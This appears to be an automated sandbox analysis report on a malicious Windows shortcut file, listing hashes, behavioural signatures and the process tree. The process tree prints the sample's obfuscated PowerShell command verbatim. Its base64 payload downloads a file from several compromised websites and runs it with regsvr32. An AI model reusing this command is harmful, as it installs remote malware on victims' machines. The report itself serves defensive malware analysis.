Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
20/11/2024, 14:10
Static task
static1
Behavioral task
behavioral1
Sample
cdff57212816c50f3fd6c8dd8f9614be91028c40a571af87a8528e22ce571ee4.lnk
Resource
win7-20241023-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
cdff57212816c50f3fd6c8dd8f9614be91028c40a571af87a8528e22ce571ee4.lnk
Resource
win10v2004-20241007-en
7 signatures
150 seconds
General
-
Target
cdff57212816c50f3fd6c8dd8f9614be91028c40a571af87a8528e22ce571ee4.lnk
-
Size
3KB
-
MD5
c4c3380493698fd58c4d74f60221523d
-
SHA1
3c4496c4956db5dc7706810591ea07fb62f4f763
-
SHA256
cdff57212816c50f3fd6c8dd8f9614be91028c40a571af87a8528e22ce571ee4
-
SHA512
e7d228d49d0abcb15af741eb57cd2068eb086a1d7e292fde326fd8d37f4dbe916acb27a6f99431e4c0bf64de7d86a2913bf40338274cfd6930d50cd68a2cd6cb
Score
6/10
Malware Config
Signatures
-
pid Process 1232 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1232 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1232 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1988 wrote to memory of 1232 1988 cmd.exe 31 PID 1988 wrote to memory of 1232 1988 cmd.exe 31 PID 1988 wrote to memory of 1232 1988 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\cdff57212816c50f3fd6c8dd8f9614be91028c40a571af87a8528e22ce571ee4.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "&{'XkHTOatCg8Ef+m8L5lWLLjGlNCLf9/D1xUUoBUMFjoCxkEjg4prt84NyUttk2Teb17YBGzKJ';$iVUCDT='ICBXcml0ZS1Ib3N0ICJickdpbiI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3RvZ29nZWVrcy5uZXQvdHJhdmVsL3lRSkp';$HE='QQVEvIiwiaHR0cDovL3Rla3N0aWx1em1hbmdvcnVzdS5jb20vd3AtYWRtaW4vZHNoYXF6d0dpdVR0aW9kLyIsImh0dHBzOi8vc3VuMnUuY29tL3dwLWluY2x1ZGVzL2NiRHdwUk1ZV3pMR0QvIiwiaHR0cDovL2hha2FuYWEuY29tL2FsdGEtZnJlcXVlbmNpYS9iSUE4SjIvIiwiaHR0cDovL3RwLWNvbmNlcHRkaWZmdXNpb24uY29tL1BPVUIvN0lua1gvIiwiaHR0cDovL3RnYXNpYW1hbmFnZW1lbnQuY29tL3dwLWNvbnRlbnQvbTdEazdkYXFBWEYvIik7JHQ9ImhidnVnakkiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcZEtsU1NwQ3VhSC5oWVo7UmVnc3ZyMzIuZXhlICIkZFxkS2xTU3BDdWFILmhZWiI7YnJlYWt9IGNhdGNoIHsgfX0=';$Xh=$iVUCDT+$HE;$NoA=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($Xh));$Xh=$NoA;iex($Xh)}"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1232
-